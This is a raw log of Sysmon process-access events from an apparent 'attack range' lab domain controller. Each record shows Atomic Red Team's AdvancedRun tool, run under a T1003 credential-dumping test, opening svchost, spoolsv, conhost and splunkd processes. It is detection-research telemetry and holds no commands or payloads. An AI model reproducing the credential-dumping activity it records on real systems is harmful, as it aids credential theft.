17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953157Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953156Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953155Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953144Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953143Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953142Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
